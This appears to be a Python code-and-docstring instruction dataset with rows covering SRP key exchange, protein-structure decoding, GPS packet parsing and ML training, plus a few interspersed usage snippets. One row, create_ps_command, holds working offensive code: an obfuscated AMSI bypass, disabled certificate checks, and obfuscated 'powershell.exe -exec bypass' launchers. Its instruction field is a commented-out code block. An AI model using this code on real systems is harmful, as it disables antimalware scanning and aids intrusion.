elif path2 is not None: # checker.py is available
# Checker package is available but its script has not been
# installed (this works with pycodestyle but not with pyflakes)
return [sys.executable, path2] |
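One way the returned argument list might be used; the source file name is made up, and the None check covers the fall-through case where neither the program nor its script is found.
import subprocess
cmd = get_checker_executable('pyflakes')
if cmd is not None:
    proc = subprocess.Popen(cmd + ['example.py'],
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    output, errors = proc.communicate()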
def get_client_premaster_secret(self, password_hash, server_public, client_private, common_secret):
"""S = (B - (k * g^x)) ^ (a + (u * x)) % N
:param int server_public:
:param int password_hash:
:param int client_private:
:param int common_secret:
:rtype: int
"""
password_verifier = self.get_common_password_verifier(password_hash)
return pow(
(server_public - (self._mult * password_verifier)),
(client_private + (common_secret * password_hash)), self._prime) | S = (B - (k * g^x)) ^ (a + (u * x)) % N
:param int server_public:
:param int password_hash:
:param int client_private:
:param int common_secret:
:rtype: int | Below is the the instruction that describes the task:
### Input:
S = (B - (k * g^x)) ^ (a + (u * x)) % N
:param int server_public:
:param int password_hash:
:param int client_private:
:param int common_secret:
:rtype: int
### Response:
def get_client_premaster_secret(self, password_hash, server_public, client_private, common_secret):
"""S = (B - (k * g^x)) ^ (a + (u * x)) % N
:param int server_public:
:param int password_hash:
:param int client_private:
:param int common_secret:
:rtype: int
"""
password_verifier = self.get_common_password_verifier(password_hash)
return pow(
(server_public - (self._mult * password_verifier)),
(client_private + (common_secret * password_hash)), self._prime) |
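A toy walk-through of the docstring formula with tiny integers; real SRP uses a large safe prime and hash-derived x and u, so every number below is illustrative only.
N, g, k = 23, 5, 3                               # prime, generator, multiplier (self._prime, g, self._mult)
x, a, u = 7, 11, 13                              # password hash, client private, common secret
b = 9                                            # server private, only needed to fabricate B
v = pow(g, x, N)                                 # password verifier
B = (k * v + pow(g, b, N)) % N                   # server public value
S_client = pow(B - k * v, a + u * x, N)          # same expression as the method above
S_server = pow(pow(g, a, N) * pow(v, u, N), b, N)
assert S_client == S_server                      # both sides derive the same premaster secret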
def decode_chain_list(in_bytes):
"""Convert a list of bytes to a list of strings. Each string is of length mmtf.CHAIN_LEN
:param in_bytes: the input bytes
:return the decoded list of strings"""
tot_strings = len(in_bytes) // mmtf.utils.constants.CHAIN_LEN
out_strings = []
for i in range(tot_strings):
out_s = in_bytes[i * mmtf.utils.constants.CHAIN_LEN:i * mmtf.utils.constants.CHAIN_LEN + mmtf.utils.constants.CHAIN_LEN]
out_strings.append(out_s.decode("ascii").strip(mmtf.utils.constants.NULL_BYTE))
return out_strings | Convert a list of bytes to a list of strings. Each string is of length mmtf.CHAIN_LEN
:param in_bytes: the input bytes
:return the decoded list of strings | Below is the the instruction that describes the task:
### Input:
Convert a list of bytes to a list of strings. Each string is of length mmtf.CHAIN_LEN
:param in_bytes: the input bytes
:return the decoded list of strings
### Response:
def decode_chain_list(in_bytes):
"""Convert a list of bytes to a list of strings. Each string is of length mmtf.CHAIN_LEN
:param in_bytes: the input bytes
:return the decoded list of strings"""
tot_strings = len(in_bytes) // mmtf.utils.constants.CHAIN_LEN
out_strings = []
for i in range(tot_strings):
out_s = in_bytes[i * mmtf.utils.constants.CHAIN_LEN:i * mmtf.utils.constants.CHAIN_LEN + mmtf.utils.constants.CHAIN_LEN]
out_strings.append(out_s.decode("ascii").strip(mmtf.utils.constants.NULL_BYTE))
return out_strings |
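An illustrative call, assuming the usual 4-byte, NUL-padded chain-name fields (i.e. mmtf.utils.constants.CHAIN_LEN == 4).
raw = b"A\x00\x00\x00B\x00\x00\x00XY\x00\x00"
print(decode_chain_list(raw))   # ['A', 'B', 'XY']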
def unpack(cls, rawpacket):
"""Instantiate `Packet` from binary string.
:param rawpacket: TSIP pkt in binary format.
:type rawpacket: String.
`rawpacket` must already have framing (DLE...DLE/ETX) removed and
byte stuffing reversed.
"""
structs_ = get_structs_for_rawpacket(rawpacket)
for struct_ in structs_:
try:
return cls(*struct_.unpack(rawpacket))
        except struct.error:
            # Try next one.
            pass
# Packet ID 0xff is a pseudo-packet representing
# packets unknown to `python-TSIP` in their raw format.
#
return cls(0xff, rawpacket) | Instantiate `Packet` from binary string.
:param rawpacket: TSIP pkt in binary format.
:type rawpacket: String.
`rawpacket` must already have framing (DLE...DLE/ETX) removed and
byte stuffing reversed. | Below is the the instruction that describes the task:
### Input:
Instantiate `Packet` from binary string.
:param rawpacket: TSIP pkt in binary format.
:type rawpacket: String.
`rawpacket` must already have framing (DLE...DLE/ETX) removed and
byte stuffing reversed.
### Response:
def unpack(cls, rawpacket):
"""Instantiate `Packet` from binary string.
:param rawpacket: TSIP pkt in binary format.
:type rawpacket: String.
`rawpacket` must already have framing (DLE...DLE/ETX) removed and
byte stuffing reversed.
"""
structs_ = get_structs_for_rawpacket(rawpacket)
for struct_ in structs_:
try:
return cls(*struct_.unpack(rawpacket))
        except struct.error:
            # Try next one.
            pass
# Packet ID 0xff is a pseudo-packet representing
# packets unknown to `python-TSIP` in their raw format.
#
return cls(0xff, rawpacket) |
def is_op(call, op):
"""
:param call: The specific operator instance (a method call)
    :param op: The operator we are testing against
:return: isinstance(call, op), but faster
"""
try:
return call.id == op.id
except Exception as e:
return False | :param call: The specific operator instance (a method call)
    :param op: The operator we are testing against
:return: isinstance(call, op), but faster | Below is the the instruction that describes the task:
### Input:
:param call: The specific operator instance (a method call)
:param op: The operator we are testing against
:return: isinstance(call, op), but faster
### Response:
def is_op(call, op):
"""
:param call: The specific operator instance (a method call)
    :param op: The operator we are testing against
:return: isinstance(call, op), but faster
"""
try:
return call.id == op.id
except Exception as e:
return False |
def add_script_sequence(self):
"""
creates a script sequence based on the script iterator type selected and the selected scripts and sends it to the tree
self.tree_loaded
"""
def empty_tree(tree_model):
# COMMENT_ME
def add_children_to_list(item, somelist):
if item.hasChildren():
for rownum in range(0, item.rowCount()):
somelist.append(str(item.child(rownum, 0).text()))
output_list = []
root = tree_model.invisibleRootItem()
add_children_to_list(root, output_list)
tree_model.clear()
return output_list
name = str(self.txt_script_sequence_name.text())
new_script_list = empty_tree(self.tree_script_sequence_model)
new_script_dict = {}
for script in new_script_list:
if script in self.elements_old:
new_script_dict.update({script: self.elements_old[script]})
elif script in self.elements_from_file:
new_script_dict.update({script: self.elements_from_file[script]})
new_script_parameter_dict = {}
for index, script in enumerate(new_script_list):
new_script_parameter_dict.update({script: index})
# QtGui.QTextEdit.toPlainText()
# get the module of the current dialogue
package = get_python_package(inspect.getmodule(self).__file__)
assert package is not None # check that we actually find a module
# class_name = Script.set_up_dynamic_script(factory_scripts, new_script_parameter_list, self.cmb_looping_variable.currentText() == 'Parameter Sweep')
new_script_dict = {name: {'class': 'ScriptIterator', 'package': package, 'scripts': new_script_dict,
'info': str(self.txt_info.toPlainText()),
'settings': {'script_order': new_script_parameter_dict,
'iterator_type': str(self.cmb_looping_variable.currentText())}}}
self.selected_element_name = name
self.fill_tree(self.tree_loaded, new_script_dict)
self.elements_from_file.update(new_script_dict) | creates a script sequence based on the script iterator type selected and the selected scripts and sends it to the tree
self.tree_loaded | Below is the the instruction that describes the task:
### Input:
creates a script sequence based on the script iterator type selected and the selected scripts and sends it to the tree
self.tree_loaded
### Response:
def add_script_sequence(self):
"""
creates a script sequence based on the script iterator type selected and the selected scripts and sends it to the tree
self.tree_loaded
"""
def empty_tree(tree_model):
# COMMENT_ME
def add_children_to_list(item, somelist):
if item.hasChildren():
for rownum in range(0, item.rowCount()):
somelist.append(str(item.child(rownum, 0).text()))
output_list = []
root = tree_model.invisibleRootItem()
add_children_to_list(root, output_list)
tree_model.clear()
return output_list
name = str(self.txt_script_sequence_name.text())
new_script_list = empty_tree(self.tree_script_sequence_model)
new_script_dict = {}
for script in new_script_list:
if script in self.elements_old:
new_script_dict.update({script: self.elements_old[script]})
elif script in self.elements_from_file:
new_script_dict.update({script: self.elements_from_file[script]})
new_script_parameter_dict = {}
for index, script in enumerate(new_script_list):
new_script_parameter_dict.update({script: index})
# QtGui.QTextEdit.toPlainText()
# get the module of the current dialogue
package = get_python_package(inspect.getmodule(self).__file__)
assert package is not None # check that we actually find a module
# class_name = Script.set_up_dynamic_script(factory_scripts, new_script_parameter_list, self.cmb_looping_variable.currentText() == 'Parameter Sweep')
new_script_dict = {name: {'class': 'ScriptIterator', 'package': package, 'scripts': new_script_dict,
'info': str(self.txt_info.toPlainText()),
'settings': {'script_order': new_script_parameter_dict,
'iterator_type': str(self.cmb_looping_variable.currentText())}}}
self.selected_element_name = name
self.fill_tree(self.tree_loaded, new_script_dict)
self.elements_from_file.update(new_script_dict) |
def est_gaba_conc(self):
"""
Estimate gaba concentration based on equation adapted from Sanacora
1999, p1045
Ref: Sanacora, G., Mason, G. F., Rothman, D. L., Behar, K. L., Hyder,
F., Petroff, O. A., ... & Krystal, J. H. (1999). Reduced cortical
$\gamma$-aminobutyric acid levels in depressed patients determined by
proton magnetic resonance spectroscopy. Archives of general psychiatry,
56(11), 1043.
"""
# need gaba_auc and creatine_auc
if not hasattr(self, 'gaba_params'):
self.fit_gaba()
# estimate [GABA] according to equation 9
gaba_conc_est = self.gaba_auc / self.creatine_auc * 1.5 * 9.0
self.gaba_conc_est = gaba_conc_est | Estimate gaba concentration based on equation adapted from Sanacora
1999, p1045
Ref: Sanacora, G., Mason, G. F., Rothman, D. L., Behar, K. L., Hyder,
F., Petroff, O. A., ... & Krystal, J. H. (1999). Reduced cortical
$\gamma$-aminobutyric acid levels in depressed patients determined by
proton magnetic resonance spectroscopy. Archives of general psychiatry,
56(11), 1043. | Below is the instruction that describes the task:
### Input:
Estimate gaba concentration based on equation adapted from Sanacora
1999, p1045
Ref: Sanacora, G., Mason, G. F., Rothman, D. L., Behar, K. L., Hyder,
F., Petroff, O. A., ... & Krystal, J. H. (1999). Reduced cortical
$\gamma$-aminobutyric acid levels in depressed patients determined by
proton magnetic resonance spectroscopy. Archives of general psychiatry,
56(11), 1043.
### Response:
def est_gaba_conc(self):
"""
Estimate gaba concentration based on equation adapted from Sanacora
1999, p1045
Ref: Sanacora, G., Mason, G. F., Rothman, D. L., Behar, K. L., Hyder,
F., Petroff, O. A., ... & Krystal, J. H. (1999). Reduced cortical
$\gamma$-aminobutyric acid levels in depressed patients determined by
proton magnetic resonance spectroscopy. Archives of general psychiatry,
56(11), 1043.
"""
# need gaba_auc and creatine_auc
if not hasattr(self, 'gaba_params'):
self.fit_gaba()
# estimate [GABA] according to equation 9
gaba_conc_est = self.gaba_auc / self.creatine_auc * 1.5 * 9.0
self.gaba_conc_est = gaba_conc_est |
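A worked number for the scaling on the final line, using made-up areas under the curve; only the 1.5 * 9.0 factors come from the method above.
# Hypothetical AUC values, just to show the arithmetic of the estimate.
gaba_auc = 0.5
creatine_auc = 3.0
gaba_conc_est = gaba_auc / creatine_auc * 1.5 * 9.0
print(gaba_conc_est)  # 2.25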
def checker(func: Callable) -> Callable:
"""
A decorator that will convert AssertionErrors into
CiVerificationError.
:param func: A function that will raise AssertionError
:return: The given function wrapped to raise a CiVerificationError on AssertionError
"""
def func_wrapper(*args, **kwargs):
try:
func(*args, **kwargs)
return True
except AssertionError:
raise CiVerificationError(
'The verification check for the environment did not pass.'
)
return func_wrapper | A decorator that will convert AssertionErrors into
CiVerificationError.
:param func: A function that will raise AssertionError
:return: The given function wrapped to raise a CiVerificationError on AssertionError | Below is the instruction that describes the task:
### Input:
A decorator that will convert AssertionErrors into
CiVerificationError.
:param func: A function that will raise AssertionError
:return: The given function wrapped to raise a CiVerificationError on AssertionError
### Response:
def checker(func: Callable) -> Callable:
"""
A decorator that will convert AssertionErrors into
CiVerificationError.
:param func: A function that will raise AssertionError
:return: The given function wrapped to raise a CiVerificationError on AssertionError
"""
def func_wrapper(*args, **kwargs):
try:
func(*args, **kwargs)
return True
except AssertionError:
raise CiVerificationError(
'The verification check for the environment did not pass.'
)
return func_wrapper |
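A usage sketch of the decorator above, assuming it is importable (it needs typing.Callable for its annotation); CiVerificationError is stubbed in here because the real exception class is defined elsewhere in the package.
class CiVerificationError(Exception):
    """Stand-in for the package's real exception class."""
@checker
def check_ci_branch(branch):
    # Any failed assert becomes a CiVerificationError; success returns True.
    assert branch == 'master'
print(check_ci_branch('master'))        # True
try:
    check_ci_branch('feature/x')
except CiVerificationError as exc:
    print(exc)                          # verification failure message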
def sort_by_name(infile, outfile):
'''Sorts input sequence file by sort -d -k1,1, writes sorted output file.'''
seqs = {}
file_to_dict(infile, seqs)
#seqs = list(seqs.values())
#seqs.sort()
fout = utils.open_file_write(outfile)
for name in sorted(seqs):
print(seqs[name], file=fout)
utils.close(fout) | Sorts input sequence file by sort -d -k1,1, writes sorted output file. | Below is the instruction that describes the task:
### Input:
Sorts input sequence file by sort -d -k1,1, writes sorted output file.
### Response:
def sort_by_name(infile, outfile):
'''Sorts input sequence file by sort -d -k1,1, writes sorted output file.'''
seqs = {}
file_to_dict(infile, seqs)
#seqs = list(seqs.values())
#seqs.sort()
fout = utils.open_file_write(outfile)
for name in sorted(seqs):
print(seqs[name], file=fout)
utils.close(fout) |
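A dependency-free illustration of the same idea, since the pyfastaq helpers (file_to_dict, utils.open_file_write, utils.close) are not reproduced here.
# Toy stand-in: write FASTA-like records sorted lexicographically by name.
records = {'seq3': '>seq3\nACGT', 'seq1': '>seq1\nGGCC', 'seq2': '>seq2\nTTAA'}
with open('sorted.fa', 'w') as fout:
    for name in sorted(records):   # mirrors the sorted(seqs) loop above
        print(records[name], file=fout)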
def handle_cable(cable, handler, standalone=True):
"""\
Emits event from the provided `cable` to the handler.
`cable`
A cable object.
`handler`
A ICableHandler instance.
`standalone`
Indicates if a `start` and `end` event should be
issued (default: ``True``).
If `standalone` is set to ``False``, no ``handler.start()``
and ``handler.end()`` event will be issued.
"""
def datetime(dt):
date, time = dt.split(u' ')
if len(time) == 5:
time += u':00'
time += u'Z'
return u'T'.join([date, time])
if standalone:
handler.start()
handler.start_cable(cable.reference_id, cable.canonical_id)
for iri in cable.wl_uris:
handler.handle_wikileaks_iri(iri)
handler.handle_creation_datetime(datetime(cable.created))
if cable.released:
handler.handle_release_date(cable.released[:10])
if cable.nondisclosure_deadline:
handler.handle_nondisclosure_deadline(cable.nondisclosure_deadline)
if cable.transmission_id:
handler.handle_transmission_id(cable.transmission_id)
if cable.subject:
handler.handle_subject(cable.subject)
if cable.summary:
handler.handle_summary(cable.summary)
if cable.comment:
handler.handle_comment(cable.comment)
handler.handle_header(cable.header)
handler.handle_content(cable.content)
handler.handle_origin(cable.origin)
handler.handle_classification(cable.classification)
handler.handle_partial(cable.partial)
for cat in cable.classification_categories:
handler.handle_classification_category(cat)
for classificationist in cable.classificationists:
handler.handle_classificationist(classificationist)
for signer in cable.signers:
handler.handle_signer(signer)
for tag in cable.tags:
handler.handle_tag(tag)
for iri in cable.media_uris:
handler.handle_media_iri(iri)
for rec in cable.recipients:
handler.handle_recipient(rec)
for rec in cable.info_recipients:
handler.handle_info_recipient(rec)
for ref in cable.references:
handler.handle_reference(ref)
handler.end_cable()
if standalone:
handler.end() | \
Emits event from the provided `cable` to the handler.
`cable`
A cable object.
`handler`
A ICableHandler instance.
`standalone`
Indicates if a `start` and `end` event should be
issued (default: ``True``).
If `standalone` is set to ``False``, no ``handler.start()``
and ``handler.end()`` event will be issued. | Below is the instruction that describes the task:
### Input:
\
Emits event from the provided `cable` to the handler.
`cable`
A cable object.
`handler`
A ICableHandler instance.
`standalone`
Indicates if a `start` and `end` event should be
issued (default: ``True``).
If `standalone` is set to ``False``, no ``handler.start()``
and ``handler.end()`` event will be issued.
### Response:
def handle_cable(cable, handler, standalone=True):
"""\
Emits event from the provided `cable` to the handler.
`cable`
A cable object.
`handler`
A ICableHandler instance.
`standalone`
Indicates if a `start` and `end` event should be
issued (default: ``True``).
If `standalone` is set to ``False``, no ``handler.start()``
and ``handler.end()`` event will be issued.
"""
def datetime(dt):
date, time = dt.split(u' ')
if len(time) == 5:
time += u':00'
time += u'Z'
return u'T'.join([date, time])
if standalone:
handler.start()
handler.start_cable(cable.reference_id, cable.canonical_id)
for iri in cable.wl_uris:
handler.handle_wikileaks_iri(iri)
handler.handle_creation_datetime(datetime(cable.created))
if cable.released:
handler.handle_release_date(cable.released[:10])
if cable.nondisclosure_deadline:
handler.handle_nondisclosure_deadline(cable.nondisclosure_deadline)
if cable.transmission_id:
handler.handle_transmission_id(cable.transmission_id)
if cable.subject:
handler.handle_subject(cable.subject)
if cable.summary:
handler.handle_summary(cable.summary)
if cable.comment:
handler.handle_comment(cable.comment)
handler.handle_header(cable.header)
handler.handle_content(cable.content)
handler.handle_origin(cable.origin)
handler.handle_classification(cable.classification)
handler.handle_partial(cable.partial)
for cat in cable.classification_categories:
handler.handle_classification_category(cat)
for classificationist in cable.classificationists:
handler.handle_classificationist(classificationist)
for signer in cable.signers:
handler.handle_signer(signer)
for tag in cable.tags:
handler.handle_tag(tag)
for iri in cable.media_uris:
handler.handle_media_iri(iri)
for rec in cable.recipients:
handler.handle_recipient(rec)
for rec in cable.info_recipients:
handler.handle_info_recipient(rec)
for ref in cable.references:
handler.handle_reference(ref)
handler.end_cable()
if standalone:
handler.end() |
def create_network(batch_size, update_freq):
"""Create a linear regression network for performing SVRG optimization.
:return: an instance of mx.io.NDArrayIter
:return: an instance of mx.mod.svrgmodule for performing SVRG optimization
"""
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=head)
data = np.random.randint(1, 5, [1000, 2])
#Test_Train data split
n_train = int(data.shape[0] * 0.8)
weights = np.array([1.0, 2.0])
label = data.dot(weights)
di = mx.io.NDArrayIter(data[:n_train, :], label[:n_train], batch_size=batch_size, shuffle=True, label_name='lin_reg_label')
val_iter = mx.io.NDArrayIter(data[n_train:, :], label[n_train:], batch_size=batch_size)
X = mx.sym.Variable('data')
Y = mx.symbol.Variable('lin_reg_label')
fully_connected_layer = mx.sym.FullyConnected(data=X, name='fc1', num_hidden=1)
lro = mx.sym.LinearRegressionOutput(data=fully_connected_layer, label=Y, name="lro")
mod = SVRGModule(
symbol=lro,
data_names=['data'],
label_names=['lin_reg_label'], update_freq=update_freq, logger=logging)
return di, val_iter, mod | Create a linear regression network for performing SVRG optimization.
:return: an instance of mx.io.NDArrayIter
:return: an instance of mx.mod.svrgmodule for performing SVRG optimization | Below is the instruction that describes the task:
### Input:
Create a linear regression network for performing SVRG optimization.
:return: an instance of mx.io.NDArrayIter
:return: an instance of mx.mod.svrgmodule for performing SVRG optimization
### Response:
def create_network(batch_size, update_freq):
"""Create a linear regression network for performing SVRG optimization.
:return: an instance of mx.io.NDArrayIter
:return: an instance of mx.mod.svrgmodule for performing SVRG optimization
"""
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=head)
data = np.random.randint(1, 5, [1000, 2])
#Test_Train data split
n_train = int(data.shape[0] * 0.8)
weights = np.array([1.0, 2.0])
label = data.dot(weights)
di = mx.io.NDArrayIter(data[:n_train, :], label[:n_train], batch_size=batch_size, shuffle=True, label_name='lin_reg_label')
val_iter = mx.io.NDArrayIter(data[n_train:, :], label[n_train:], batch_size=batch_size)
X = mx.sym.Variable('data')
Y = mx.symbol.Variable('lin_reg_label')
fully_connected_layer = mx.sym.FullyConnected(data=X, name='fc1', num_hidden=1)
lro = mx.sym.LinearRegressionOutput(data=fully_connected_layer, label=Y, name="lro")
mod = SVRGModule(
symbol=lro,
data_names=['data'],
label_names=['lin_reg_label'], update_freq=update_freq, logger=logging)
return di, val_iter, mod |
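A hypothetical way to train with the returned objects; the fit arguments below assume SVRGModule mirrors the usual mx.mod.Module.fit signature and may need adjusting for your MXNet version.
# Assumed usage sketch, not taken from the example's own training script.
di, val_iter, mod = create_network(batch_size=32, update_freq=2)
mod.fit(di,
        eval_data=val_iter,
        eval_metric='mse',
        optimizer='sgd',
        optimizer_params=(('learning_rate', 0.025),),
        num_epoch=10)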
def _complete_task(self, task_name, **kwargs):
""" Marks this task as completed. Kwargs are stored in the run log. """
logger.debug('Job {0} marking task {1} as completed'.format(self.name, task_name))
self.run_log['tasks'][task_name] = kwargs
for node in self.downstream(task_name, self.snapshot):
self._start_if_ready(node)
try:
self.backend.acquire_lock()
self._commit_run_log()
except:
logger.exception("Error in handling events.")
finally:
self.backend.release_lock()
if kwargs.get('success', None) == False:
task = self.tasks[task_name]
try:
self.backend.acquire_lock()
if self.event_handler:
self.event_handler.emit('task_failed',
task._serialize(include_run_logs=True))
except:
logger.exception("Error in handling events.")
finally:
self.backend.release_lock()
self._on_completion() | Marks this task as completed. Kwargs are stored in the run log. | Below is the instruction that describes the task:
### Input:
Marks this task as completed. Kwargs are stored in the run log.
### Response:
def _complete_task(self, task_name, **kwargs):
""" Marks this task as completed. Kwargs are stored in the run log. """
logger.debug('Job {0} marking task {1} as completed'.format(self.name, task_name))
self.run_log['tasks'][task_name] = kwargs
for node in self.downstream(task_name, self.snapshot):
self._start_if_ready(node)
try:
self.backend.acquire_lock()
self._commit_run_log()
except:
logger.exception("Error in handling events.")
finally:
self.backend.release_lock()
if kwargs.get('success', None) == False:
task = self.tasks[task_name]
try:
self.backend.acquire_lock()
if self.event_handler:
self.event_handler.emit('task_failed',
task._serialize(include_run_logs=True))
except:
logger.exception("Error in handling events.")
finally:
self.backend.release_lock()
self._on_completion() |
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False):
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
"""
if force_ps32:
command = amsi_bypass + """
$functions = {{
function Command-ToExecute
{{
{command}
}}
}}
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{{
$job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32
$job | Wait-Job
}}
else
{{
IEX "$functions"
Command-ToExecute
}}
""".format(command=amsi_bypass + ps_command)
else:
command = amsi_bypass + ps_command
logging.debug('Generated PS command:\n {}\n'.format(command))
# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed concurrently
# it would spawn a local powershell process per host which isn't ideal, until I figure out a good way of dealing with this
# it will use the partial python implementation that I stole from GreatSCT (https://github.com/GreatSCT/GreatSCT) <3
"""
if is_powershell_installed():
temp = tempfile.NamedTemporaryFile(prefix='cme_',
suffix='.ps1',
dir='/tmp')
temp.write(command)
temp.read()
encoding_types = [1,2,3,4,5,6]
while True:
encoding = random.choice(encoding_types)
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
temp.name,
encoding)
logging.debug(invoke_obfs_command)
out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
logging.debug('Command length: {}'.format(len(command)))
if len(command) <= 8192:
temp.close()
break
encoding_types.remove(encoding)
else:
"""
if not dont_obfs:
obfs_attempts = 0
while True:
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "' + invoke_obfuscation(command) + '"'
if len(command) <= 8191:
break
if obfs_attempts == 4:
logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
exit(1)
obfs_attempts += 1
else:
command = 'powershell.exe -noni -nop -w 1 -enc {}'.format(encode_ps_command(command))
if len(command) > 8191:
logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
exit(1)
return command | if is_powershell_installed():
temp = tempfile.NamedTemporaryFile(prefix='cme_',
suffix='.ps1',
dir='/tmp')
temp.write(command)
temp.read()
encoding_types = [1,2,3,4,5,6]
while True:
encoding = random.choice(encoding_types)
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
temp.name,
encoding)
logging.debug(invoke_obfs_command)
out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
logging.debug('Command length: {}'.format(len(command)))
if len(command) <= 8192:
temp.close()
break
encoding_types.remove(encoding)
else: | Below is the instruction that describes the task:
### Input:
if is_powershell_installed():
temp = tempfile.NamedTemporaryFile(prefix='cme_',
suffix='.ps1',
dir='/tmp')
temp.write(command)
temp.read()
encoding_types = [1,2,3,4,5,6]
while True:
encoding = random.choice(encoding_types)
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
temp.name,
encoding)
logging.debug(invoke_obfs_command)
out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
logging.debug('Command length: {}'.format(len(command)))
if len(command) <= 8192:
temp.close()
break
encoding_types.remove(encoding)
else:
### Response:
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False):
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
"""
if force_ps32:
command = amsi_bypass + """
$functions = {{
function Command-ToExecute
{{
{command}
}}
}}
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{{
$job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32
$job | Wait-Job
}}
else
{{
IEX "$functions"
Command-ToExecute
}}
""".format(command=amsi_bypass + ps_command)
else:
command = amsi_bypass + ps_command
logging.debug('Generated PS command:\n {}\n'.format(command))
# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed concurrently
# it would spawn a local powershell process per host which isn't ideal, until I figure out a good way of dealing with this
# it will use the partial python implementation that I stole from GreatSCT (https://github.com/GreatSCT/GreatSCT) <3
"""
if is_powershell_installed():
temp = tempfile.NamedTemporaryFile(prefix='cme_',
suffix='.ps1',
dir='/tmp')
temp.write(command)
temp.read()
encoding_types = [1,2,3,4,5,6]
while True:
encoding = random.choice(encoding_types)
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
temp.name,
encoding)
logging.debug(invoke_obfs_command)
out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
logging.debug('Command length: {}'.format(len(command)))
if len(command) <= 8192:
temp.close()
break
encoding_types.remove(encoding)
else:
"""
if not dont_obfs:
obfs_attempts = 0
while True:
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "' + invoke_obfuscation(command) + '"'
if len(command) <= 8191:
break
if obfs_attempts == 4:
logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
exit(1)
obfs_attempts += 1
else:
command = 'powershell.exe -noni -nop -w 1 -enc {}'.format(encode_ps_command(command))
if len(command) > 8191:
logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
exit(1)
return command |
def run(generate_pks, show_pks, host, port, uri):
"""Connect sandman to <URI> and start the API server/admin
interface."""
app.config['SQLALCHEMY_DATABASE_URI'] = uri
app.config['SANDMAN_GENERATE_PKS'] = generate_pks
app.config['SANDMAN_SHOW_PKS'] = show_pks
app.config['SERVER_HOST'] = host
app.config['SERVER_PORT'] = port
activate(name='sandmanctl')
app.run(host=host, port=int(port), debug=True) | Connect sandman to <URI> and start the API server/admin
interface. | Below is the instruction that describes the task:
### Input:
Connect sandman to <URI> and start the API server/admin
interface.
### Response:
def run(generate_pks, show_pks, host, port, uri):
"""Connect sandman to <URI> and start the API server/admin
interface."""
app.config['SQLALCHEMY_DATABASE_URI'] = uri
app.config['SANDMAN_GENERATE_PKS'] = generate_pks
app.config['SANDMAN_SHOW_PKS'] = show_pks
app.config['SERVER_HOST'] = host
app.config['SERVER_PORT'] = port
activate(name='sandmanctl')
app.run(host=host, port=int(port), debug=True) |
def add_to_filemenu():
"""Add Pyblish to file-menu
.. note:: We're going a bit hacky here, probably due to my lack
of understanding for `evalDeferred` or `executeDeferred`,
so if you can think of a better solution, feel free to edit.
"""
if hasattr(cmds, 'about') and not cmds.about(batch=True):
# As Maya builds its menus dynamically upon being accessed,
# we force its build here prior to adding our entry using its
# native mel function call.
mel.eval("evalDeferred buildFileMenu")
# Serialise function into string
script = inspect.getsource(_add_to_filemenu)
script += "\n_add_to_filemenu()"
# If cmds doesn't have any members, we're most likely in an
# uninitialized batch-mode. If it does exist, ensure we
# really aren't in batch mode.
cmds.evalDeferred(script) | Add Pyblish to file-menu
.. note:: We're going a bit hacky here, probably due to my lack
of understanding for `evalDeferred` or `executeDeferred`,
so if you can think of a better solution, feel free to edit. | Below is the instruction that describes the task:
### Input:
Add Pyblish to file-menu
.. note:: We're going a bit hacky here, probably due to my lack
of understanding for `evalDeferred` or `executeDeferred`,
so if you can think of a better solution, feel free to edit.
### Response:
def add_to_filemenu():
"""Add Pyblish to file-menu
.. note:: We're going a bit hacky here, probably due to my lack
of understanding for `evalDeferred` or `executeDeferred`,
so if you can think of a better solution, feel free to edit.
"""
if hasattr(cmds, 'about') and not cmds.about(batch=True):
# As Maya builds its menus dynamically upon being accessed,
# we force its build here prior to adding our entry using its
# native mel function call.
